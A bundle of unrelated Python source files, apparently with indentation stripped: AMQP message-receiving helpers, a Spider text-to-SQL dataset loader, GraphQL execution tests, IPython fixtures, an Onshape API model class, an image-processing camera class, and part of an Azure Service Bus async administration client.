:param source: The AMQP source endpoint to receive from.
:type source: str, bytes or ~uamqp.address.Source
:param auth: The authentication credentials for the endpoint.
This should be one of the subclasses of uamqp.authentication.AMQPAuth. Currently
this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param timeout: The timeout in milliseconds after which to return None if no messages
are retrieved. If set to `0` (the default), the receiver will not timeout and
will continue to wait for messages until interrupted.
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:rtype: ~uamqp.message.Message or None
"""
received = receive_messages(source, auth=auth, max_batch_size=1, timeout=timeout, debug=debug)
if received:
return received[0]
return None
def receive_messages(source, auth=None, max_batch_size=None, timeout=0, debug=False, **kwargs):
"""Receive a batch of messages from an AMQP endpoint.
:param source: The AMQP source endpoint to receive from.
:type source: str, bytes or ~uamqp.address.Source
:param auth: The authentication credentials for the endpoint.
This should be one of the subclasses of ~uamqp.authentication.AMQPAuth. Currently
this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param max_batch_size: The maximum number of messages to return in a batch. If the
receiver receives a smaller number than this, it will not wait to return them so
the actual number returned can be anything up to this value. If the receiver reaches
a timeout, an empty list will be returned.
:param timeout: The timeout in milliseconds after which to return if no messages
are retrieved. If set to `0` (the default), the receiver will not timeout and
will continue to wait for messages until interrupted.
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:rtype: list[~uamqp.message.Message]
"""
if max_batch_size:
kwargs['prefetch'] = max_batch_size
with ReceiveClient(source, auth=auth, debug=debug, **kwargs) as receive_client:
return receive_client.receive_message_batch( # pylint: disable=no-member
max_batch_size=max_batch_size or receive_client._prefetch, timeout=timeout) # pylint: disable=protected-access, no-member
class _Platform(object):
"""Runs any platform preparatory steps for the AMQP C
library. This is primarily used for OpenSSL setup.
:ivar initialized: When the setup has completed.
:vartype initialized: bool
"""
initialized = False
@classmethod
def initialize(cls):
"""Initialize the TLS/SSL platform to prepare it for
making AMQP requests. This only needs to happen once.
"""
if cls.initialized:
_logger.debug("Platform already initialized.")
else:
_logger.debug("Initializing platform.")
c_uamqp.platform_init()
cls.initialized = True
@classmethod
def deinitialize(cls):
"""Deinitialize the TLS/SSL platform to prepare it for
making AMQP requests. This only needs to happen once.
"""
if not cls.initialized:
_logger.debug("Platform already deinitialized.")
else:
#cls.initialized = False
_logger.debug("Deinitializing platform.")
#c_uamqp.platform_deinit()
def get_platform_info():
"""Gets the current platform information.
:rtype: str
"""
return str(c_uamqp.get_info())
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Spider: A Large-Scale Human-Labeled Dataset for Text-to-SQL Tasks"""
import json
import os
import datasets
logger = datasets.logging.get_logger(__name__)
_CITATION = """\
@article{yu2018spider,
title={Spider: A large-scale human-labeled dataset for complex and cross-domain semantic parsing and text-to-sql task},
author={Yu, Tao and Zhang, Rui and Yang, Kai and Yasunaga, Michihiro and Wang, Dongxu and Li, Zifan and Ma, James and Li, Irene and Yao, Qingning and Roman, Shanelle and others},
journal={arXiv preprint arXiv:1809.08887},
year={2018}
}
"""
_DESCRIPTION = """\
Spider is a large-scale complex and cross-domain semantic parsing and text-toSQL dataset annotated by 11 college students
"""
_HOMEPAGE = "https://yale-lily.github.io/spider"
_LICENSE = "CC BY-SA 4.0"
_URL = "https://huggingface.co/datasets/spider/resolve/main/data/spider.zip"
class Spider(datasets.GeneratorBasedBuilder):
VERSION = datasets.Version("1.0.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(
name="spider",
version=VERSION,
description="Spider: A Large-Scale Human-Labeled Dataset for Text-to-SQL Tasks",
),
]
def _info(self):
features = datasets.Features(
{
"db_id": datasets.Value("string"),
"query": datasets.Value("string"),
"question": datasets.Value("string"),
"query_toks": datasets.features.Sequence(datasets.Value("string")),
"query_toks_no_value": datasets.features.Sequence(datasets.Value("string")),
"question_toks": datasets.features.Sequence(datasets.Value("string")),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
downloaded_filepath = dl_manager.download_and_extract(_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"data_filepath": os.path.join(downloaded_filepath, "spider/train_spider.json"),
},
),
datasets.SplitGenerator(
name=datasets.Split.VALIDATION,
gen_kwargs={
"data_filepath": os.path.join(downloaded_filepath, "spider/dev.json"),
},
),
]
def _generate_examples(self, data_filepath):
"""This function returns the examples in the raw (text) form."""
logger.info("generating examples from = %s", data_filepath)
with open(data_filepath, encoding="utf-8") as f:
spider = json.load(f)
for idx, sample in enumerate(spider):
yield idx, {
"db_id": sample["db_id"],
"query": sample["query"],
"question": sample["question"],
"query_toks": sample["query_toks"],
"query_toks_no_value": sample["query_toks_no_value"],
"question_toks": sample["question_toks"],
}
|
from precisely import all_of, assert_that, contains_exactly, equal_to, has_attrs, has_feature, is_instance
import graphlayer as g
from graphlayer import graphql
from graphql import GraphQLError
def test_execute():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({"value": "resolved"})))
def test_executor():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
}
"""
execute = graphql.executor(query_type=Root)
result = execute(graph=graph, document_text=query)
assert_that(result, is_success(data=equal_to({"value": "resolved"})))
def test_can_query_schema():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
graph_definition = g.define_graph(resolvers=())
graph = graph_definition.create_graph({})
query = """
query {
__schema {
queryType { name }
}
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({
"__schema": {
"queryType": {
"name": "Root",
},
},
})))
def test_can_query_schema_with_other_data():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
__schema {
queryType { name }
}
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({
"value": "resolved",
"__schema": {
"queryType": {
"name": "Root",
},
},
})))
def test_variables_can_be_used_in_schema_query():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
graph_definition = g.define_graph(resolvers=())
graph = graph_definition.create_graph({})
query = """
query ($f: Boolean!, $t: Boolean!) {
included: __schema @include(if: $t) {
queryType { name }
}
excluded: __schema @include(if: $f) {
queryType { name }
}
}
"""
variables = {"t": True, "f": False}
result = graphql.execute(graph=graph, document_text=query, query_type=Root, variables=variables)
assert_that(result, is_success(data=equal_to({
"included": {
"queryType": {
"name": "Root",
},
},
})))
def test_typename():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
__typename
value
typename: __typename
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({"__typename": "Root", "value": "resolved", "typename": "Root"})))
def test_when_query_is_invalid_then_result_is_invalid():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
graph_definition = g.define_graph(resolvers=())
graph = graph_definition.create_graph({})
query = """
query {
bad
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_invalid(errors=contains_exactly(
has_attrs(message="Cannot query field 'bad' on type 'Root'."),
)))
def test_when_resolution_raises_graph_error_then_result_is_invalid():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
raise g.GraphError("BAD")
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_invalid(errors=contains_exactly(
all_of(
is_instance(GraphQLError),
has_str("BAD"),
),
)))
def is_invalid(*, errors):
return has_attrs(errors=errors, data=None)
def is_success(*, data):
return has_attrs(
data=data,
errors=None,
)
def has_str(matcher):
return has_feature("str", str, matcher)
|
import pytest
from IPython.testing.globalipapp import start_ipython
@pytest.fixture(scope="session")
def session_ip():
return start_ipython()
@pytest.fixture(scope="function")
def ip(session_ip):
session_ip.run_line_magic(magic_name="load_ext", line="jupyter_spaces")
yield session_ip
session_ip.run_line_magic(magic_name="unload_ext", line="jupyter_spaces")
session_ip.run_line_magic(magic_name="reset", line="-f")
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
class BTTranslationRequestInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("request_state",): {"ACTIVE": "ACTIVE", "DONE": "DONE", "FAILED": "FAILED",},
}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"document_id": (str,), # noqa: E501
"failure_reason": (str,), # noqa: E501
"href": (str,), # noqa: E501
"id": (str,), # noqa: E501
"name": (str,), # noqa: E501
"request_element_id": (str,), # noqa: E501
"request_state": (str,), # noqa: E501
"result_document_id": (str,), # noqa: E501
"result_element_ids": ([str],), # noqa: E501
"result_external_data_ids": ([str],), # noqa: E501
"result_workspace_id": (str,), # noqa: E501
"version_id": (str,), # noqa: E501
"view_ref": (str,), # noqa: E501
"workspace_id": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"document_id": "documentId", # noqa: E501
"failure_reason": "failureReason", # noqa: E501
"href": "href", # noqa: E501
"id": "id", # noqa: E501
"name": "name", # noqa: E501
"request_element_id": "requestElementId", # noqa: E501
"request_state": "requestState", # noqa: E501
"result_document_id": "resultDocumentId", # noqa: E501
"result_element_ids": "resultElementIds", # noqa: E501
"result_external_data_ids": "resultExternalDataIds", # noqa: E501
"result_workspace_id": "resultWorkspaceId", # noqa: E501
"version_id": "versionId", # noqa: E501
"view_ref": "viewRef", # noqa: E501
"workspace_id": "workspaceId", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_translation_request_info.BTTranslationRequestInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
document_id (str): [optional] # noqa: E501
failure_reason (str): [optional] # noqa: E501
href (str): [optional] # noqa: E501
id (str): [optional] # noqa: E501
name (str): [optional] # noqa: E501
request_element_id (str): [optional] # noqa: E501
request_state (str): [optional] # noqa: E501
result_document_id (str): [optional] # noqa: E501
result_element_ids ([str]): [optional] # noqa: E501
result_external_data_ids ([str]): [optional] # noqa: E501
result_workspace_id (str): [optional] # noqa: E501
version_id (str): [optional] # noqa: E501
view_ref (str): [optional] # noqa: E501
workspace_id (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
import threading
import binascii
from time import sleep
from utils import *
############################################################################
import base64
import io
from PIL import Image
def img_to_txt(filename):
msg = b"<plain_txt_msg:img>"
with open(filename, "rb") as imageFile:
msg = msg + base64.b64encode(imageFile.read())
msg = msg + b"<!plain_txt_msg>"
return msg
def decode_img(msg):
msg = msg[msg.find(b"<plain_txt_msg:img>")+len(b"<plain_txt_msg:img>"):
msg.find(b"<!plain_txt_msg>")]
msg = base64.b64decode(msg)
buf = io.BytesIO(msg)
img = Image.open(buf)
return img
# filename = 'test.png'
# msg = img_to_txt(filename)
# img = decode_img(msg)
# img.show()
#########################################################################
class Camera(object):
def __init__(self, makeup_artist):
self.to_process = []
self.to_output = []
self.makeup_artist = makeup_artist
thread = threading.Thread(target=self.keep_processing, args=())
thread.daemon = True
thread.start()
def process_one(self):
if not self.to_process:
return
# input is an ascii string.
input_str = self.to_process.pop(0)
# convert it to a pil image
input_img = decode_img(input_str)
input_img.show()
input_img.convert('1')
input_img.show()
################## where the hard work is done ############
# output_img is an PIL image
output_img = self.makeup_artist.apply_makeup(input_img)
# output_str is a base64 string in ascii
output_str = img_to_txt(output_img)
# convert eh base64 string in ascii to base64 string in _bytes_
self.to_output.append(binascii.a2b_base64(output_str))
def keep_processing(self):
while True:
self.process_one()
sleep(0.01)
def enqueue_input(self, input):
self.to_process.append(input)
def get_frame(self):
while not self.to_output:
sleep(0.05)
return self.to_output.pop(0)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint:disable=protected-access
# pylint:disable=specify-parameter-names-in-call
# pylint:disable=too-many-lines
import functools
from typing import TYPE_CHECKING, Any, Union, cast
from xml.etree.ElementTree import ElementTree
from azure.core.async_paging import AsyncItemPaged
from azure.core.exceptions import ResourceNotFoundError
from azure.core.pipeline import AsyncPipeline
from azure.core.pipeline.policies import HttpLoggingPolicy, DistributedTracingPolicy, ContentDecodePolicy, \
RequestIdPolicy, AsyncBearerTokenCredentialPolicy
from azure.core.pipeline.transport import AioHttpTransport
from ...management._generated.models import QueueDescriptionFeed, TopicDescriptionEntry, \
QueueDescriptionEntry, SubscriptionDescriptionFeed, SubscriptionDescriptionEntry, RuleDescriptionEntry, \
RuleDescriptionFeed, NamespacePropertiesEntry, CreateTopicBody, CreateTopicBodyContent, \
TopicDescriptionFeed, CreateSubscriptionBody, CreateSubscriptionBodyContent, CreateRuleBody, \
CreateRuleBodyContent, CreateQueueBody, CreateQueueBodyContent
from ..._common.utils import parse_conn_str
from ..._common.constants import JWT_TOKEN_SCOPE
from ...aio._base_handler_async import ServiceBusSharedKeyCredential, ServiceBusSASTokenCredential
from ...management._generated.aio._configuration_async import ServiceBusManagementClientConfiguration
from ...management._generated.aio._service_bus_management_client_async import ServiceBusManagementClient \
as ServiceBusManagementClientImpl
from ...management import _constants as constants
from ._shared_key_policy_async import AsyncServiceBusSharedKeyCredentialPolicy
from ...management._models import QueueRuntimeProperties, QueueProperties, TopicProperties, TopicRuntimeProperties, \
SubscriptionProperties, SubscriptionRuntimeProperties, RuleProperties, NamespaceProperties
from ...management._xml_workaround_policy import ServiceBusXMLWorkaroundPolicy
from ...management._handle_response_error import _handle_response_error
from ...management._model_workaround import avoid_timedelta_overflow
from ._utils import extract_data_template, extract_rule_data_template, get_next_template
from ...management._utils import deserialize_rule_key_values, serialize_rule_key_values
if TYPE_CHECKING:
from azure.core.credentials_async import AsyncTokenCredential # pylint:disable=ungrouped-imports
class ServiceBusAdministrationClient: #pylint:disable=too-many-public-methods
"""Use this client to create, update, list, and delete resources of a ServiceBus namespace.
:param str fully_qualified_namespace: The fully qualified host name for the Service Bus namespace.
:param credential: To authenticate to manage the entities of the ServiceBus namespace.
:type credential: AsyncTokenCredential
"""
def __init__(
self, fully_qualified_namespace: str,
credential: "AsyncTokenCredential",
**kwargs) -> None:
self.fully_qualified_namespace = fully_qualified_namespace
self._credential = credential
self._endpoint = "https://" + fully_qualified_namespace
self._config = ServiceBusManagementClientConfiguration(self._endpoint, **kwargs)
self._pipeline = self._build_pipeline()
self._impl = ServiceBusManagementClientImpl(endpoint=fully_qualified_namespace, pipeline=self._pipeline)
async def __aenter__(self) -> "ServiceBusAdministrationClient":
await self._impl.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._impl.__aexit__(*exc_details)
def _build_pipeline(self, **kwargs): # pylint: disable=no-self-use
transport = kwargs.get('transport')
policies = kwargs.get('policies')
credential_policy = \
AsyncServiceBusSharedKeyCredentialPolicy(self._endpoint, self._credential, "Authorization") \
if isinstance(self._credential, ServiceBusSharedKeyCredential) \
else AsyncBearerTokenCredentialPolicy(self._credential, JWT_TOKEN_SCOPE)
if policies is None: # [] is a valid policy list
policies = [
RequestIdPolicy(**kwargs),
self._config.headers_policy,
self._config.user_agent_policy,
self._config.proxy_policy,
ContentDecodePolicy(**kwargs),
ServiceBusXMLWorkaroundPolicy(),
self._config.redirect_policy,
self._config.retry_policy,
credential_policy,
self._config.logging_policy,
DistributedTracingPolicy(**kwargs),
HttpLoggingPolicy(**kwargs),
]
if not transport:
transport = AioHttpTransport(**kwargs)
return AsyncPipeline(transport, policies)
async def _get_entity_element(self, entity_name, enrich=False, **kwargs):
# type: (str, bool, Any) -> ElementTree
with _handle_response_error():
element = cast(
ElementTree,
await self._impl.entity.get(entity_name, enrich=enrich, api_version=constants.API_VERSION, **kwargs)
)
return element
async def _get_subscription_element(self, topic_name, subscription_name, enrich=False, **kwargs):
# type: (str, str, bool, Any) -> ElementTree
with _handle_response_error():
element = cast(
ElementTree,
await self._impl.subscription.get(
topic_name, subscription_name, enrich=enrich, api_version=constants.API_VERSION, **kwargs)
)
return element
async def _get_rule_element(self, topic_name, subscription_name, rule_name, **kwargs):
# type: (str, str, str, Any) -> ElementTree
with _handle_response_error():
element = cast(
ElementTree,
await self._impl.rule.get(
topic_name, subscription_name, rule_name, enrich=False, api_version=constants.API_VERSION, **kwargs)
)
return element
@classmethod
def from_connection_string(cls, conn_str: str, **kwargs: Any) -> "ServiceBusAdministrationClient":
"""Create a client from connection string.
:param str conn_str: The connection string of the Service Bus Namespace.
:rtype: ~azure.servicebus.management.aio.ServiceBusAdministrationClient
"""
endpoint, shared_access_key_name, shared_access_key, _, token, token_expiry = parse_conn_str(conn_str)
if token and token_expiry:
credential = ServiceBusSASTokenCredential(token, token_expiry)
elif shared_access_key_name and shared_access_key:
credential = ServiceBusSharedKeyCredential(shared_access_key_name, shared_access_key) # type: ignore
if "//" in endpoint:
endpoint = endpoint[endpoint.index("//")+2:]
return cls(endpoint, credential, **kwargs) # type: ignore
async def get_queue(self, queue_name: str, **kwargs) -> QueueProperties:
"""Get the properties of a queue.
:param str queue_name: The name of the queue.
:rtype: ~azure.servicebus.management.QueueProperties
"""
entry_ele = await self._get_entity_element(queue_name, **kwargs)
entry = QueueDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Queue '{}' does not exist".format(queue_name))
queue_description = QueueProperties._from_internal_entity(queue_name,
entry.content.queue_description)
return queue_description
async def get_queue_runtime_properties(self, queue_name: str, **kwargs) -> QueueRuntimeProperties:
"""Get the runtime information of a queue.
:param str queue_name: The name of the queue.
:rtype: ~azure.servicebus.management.QueueRuntimeProperties
"""
entry_ele = await self._get_entity_element(queue_name, **kwargs)
entry = QueueDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Queue {} does not exist".format(queue_name))
runtime_properties = QueueRuntimeProperties._from_internal_entity(queue_name,
entry.content.queue_description)
return runtime_properties
async def create_queue(self, name: str, **kwargs) -> QueueProperties:
"""Create a queue.
:param name: Name of the queue.
:type name: str
:keyword authorization_rules: Authorization rules for resource.
:type authorization_rules: list[~azure.servicebus.management.AuthorizationRule]
:keyword auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the queue is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:keyword dead_lettering_on_message_expiration: A value that indicates whether this queue has dead
letter support when a message expires.
:type dead_lettering_on_message_expiration: bool
:keyword default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:keyword duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
duration of the duplicate detection history. The default value is 10 minutes.
:type duplicate_detection_history_time_window: ~datetime.timedelta
:keyword enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:keyword enable_express: A value that indicates whether Express Entities are enabled. An express
queue holds a message in memory temporarily before writing it to persistent storage.
:type enable_express: bool
:keyword enable_partitioning: A value that indicates whether the queue is to be partitioned
across multiple message brokers.
:type enable_partitioning: bool
:keyword lock_duration: ISO 8601 timespan duration of a peek-lock; that is, the amount of time
that the message is locked for other receivers. The maximum value for LockDuration is 5
minutes; the default value is 1 minute.
:type lock_duration: ~datetime.timedelta
:keyword max_delivery_count: The maximum delivery count. A message is automatically deadlettered
after this number of deliveries. Default value is 10.
:type max_delivery_count: int
:keyword max_size_in_megabytes: The maximum size of the queue in megabytes, which is the size of
memory allocated for the queue.
:type max_size_in_megabytes: int
:keyword requires_duplicate_detection: A value indicating if this queue requires duplicate
detection.
:type requires_duplicate_detection: bool
:keyword requires_session: A value that indicates whether the queue supports the concept of
sessions.
:type requires_session: bool
:keyword forward_to: The name of the recipient entity to which all the messages sent to the queue
are forwarded to.
:type forward_to: str
:keyword user_metadata: Custom metdata that user can associate with the description. Max length
is 1024 chars.
:type user_metadata: str
:keyword forward_dead_lettered_messages_to: The name of the recipient entity to which all the
dead-lettered messages of this subscription are forwarded to.
:type forward_dead_lettered_messages_to: str
:rtype: ~azure.servicebus.management.QueueProperties
"""
queue = QueueProperties(
name,
authorization_rules=kwargs.pop("authorization_rules", None),
auto_delete_on_idle=kwargs.pop("auto_delete_on_idle", None),
dead_lettering_on_message_expiration=kwargs.pop("dead_lettering_on_message_expiration", None),
default_message_time_to_live=kwargs.pop("default_message_time_to_live", None),
duplicate_detection_history_time_window=kwargs.pop("duplicate_detection_history_time_window", None),
availability_status=None,
enable_batched_operations=kwargs.pop("enable_batched_operations", None),
enable_express=kwargs.pop("enable_express", None),
enable_partitioning=kwargs.pop("enable_partitioning", None),
lock_duration=kwargs.pop("lock_duration", None),
max_delivery_count=kwargs.pop("max_delivery_count", None),
max_size_in_megabytes=kwargs.pop("max_size_in_megabytes", None),
requires_duplicate_detection=kwargs.pop("requires_duplicate_detection", None),
requires_session=kwargs.pop("requires_session", None),
status=kwargs.pop("status", None),
forward_to=kwargs.pop("forward_to", None),
forward_dead_lettered_messages_to=kwargs.pop("forward_dead_lettered_messages_to", None),
user_metadata=kwargs.pop("user_metadata", None)
)
to_create = queue._to_internal_entity()
create_entity_body = CreateQueueBody(
content=CreateQueueBodyContent(
queue_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
entry_ele = cast(
ElementTree,
await self._impl.entity.put(
name, # type: ignore
request_body, api_version=constants.API_VERSION, **kwargs)
)
entry = QueueDescriptionEntry.deserialize(entry_ele)
result = QueueProperties._from_internal_entity(name,
entry.content.queue_description)
return result
async def update_queue(self, queue: QueueProperties, **kwargs) -> None:
"""Update a queue.
Before calling this method, you should use `get_queue`, `create_queue` or `list_queues` to get a
`QueueProperties` instance, then update the properties. Only a portion of properties can
be updated. Refer to https://docs.microsoft.com/en-us/rest/api/servicebus/update-queue.
:param queue: The queue that is returned from `get_queue`, `create_queue` or `list_queues` and
has the updated properties.
:type queue: ~azure.servicebus.management.QueueProperties
:rtype: None
"""
to_update = queue._to_internal_entity()
to_update.default_message_time_to_live = avoid_timedelta_overflow(to_update.default_message_time_to_live)
to_update.auto_delete_on_idle = avoid_timedelta_overflow(to_update.auto_delete_on_idle)
create_entity_body = CreateQueueBody(
content=CreateQueueBodyContent(
queue_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
await self._impl.entity.put(
queue.name, # type: ignore
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_queue(self, queue: Union[str, QueueProperties], **kwargs) -> None:
"""Delete a queue.
:param Union[str, azure.servicebus.management.QueueProperties] queue: The name of the queue or
a `QueueProperties` with name.
:rtype: None
"""
try:
queue_name = queue.name # type: ignore
except AttributeError:
queue_name = queue
if not queue_name:
raise ValueError("queue_name must not be None or empty")
with _handle_response_error():
await self._impl.entity.delete(queue_name, api_version=constants.API_VERSION, **kwargs)
def list_queues(self, **kwargs: Any) -> AsyncItemPaged[QueueProperties]:
"""List the queues of a ServiceBus namespace.
:returns: An iterable (auto-paging) response of QueueProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.QueueProperties]
"""
def entry_to_qd(entry):
qd = QueueProperties._from_internal_entity(entry.title, entry.content.queue_description)
return qd
extract_data = functools.partial(
extract_data_template, QueueDescriptionFeed, entry_to_qd
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_QUEUES), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
def list_queues_runtime_properties(self, **kwargs: Any) -> AsyncItemPaged[QueueRuntimeProperties]:
"""List the runtime information of the queues in a ServiceBus namespace.
:returns: An iterable (auto-paging) response of QueueRuntimeProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.QueueRuntimeProperties]
"""
def entry_to_qr(entry):
qd = QueueRuntimeProperties._from_internal_entity(entry.title, entry.content.queue_description)
return qd
extract_data = functools.partial(
extract_data_template, QueueDescriptionFeed, entry_to_qr
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_QUEUES), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_topic(self, topic_name: str, **kwargs) -> TopicProperties:
"""Get the properties of a topic.
:param str topic_name: The name of the topic.
:rtype: ~azure.servicebus.management.TopicDescription
"""
entry_ele = await self._get_entity_element(topic_name, **kwargs)
entry = TopicDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Topic '{}' does not exist".format(topic_name))
topic_description = TopicProperties._from_internal_entity(topic_name, entry.content.topic_description)
return topic_description
async def get_topic_runtime_properties(self, topic_name: str, **kwargs) -> TopicRuntimeProperties:
"""Get the runtime information of a topic.
:param str topic_name: The name of the topic.
:rtype: ~azure.servicebus.management.TopicRuntimeProperties
"""
entry_ele = await self._get_entity_element(topic_name, **kwargs)
entry = TopicDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Topic {} does not exist".format(topic_name))
topic_description = TopicRuntimeProperties._from_internal_entity(topic_name, entry.content.topic_description)
return topic_description
async def create_topic(self, name: str, **kwargs) -> TopicProperties:
"""Create a topic.
:param name: Name of the topic.
:type name: str
:keyword default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:keyword max_size_in_megabytes: The maximum size of the topic in megabytes, which is the size of
memory allocated for the topic.
:type max_size_in_megabytes: long
:keyword requires_duplicate_detection: A value indicating if this topic requires duplicate
detection.
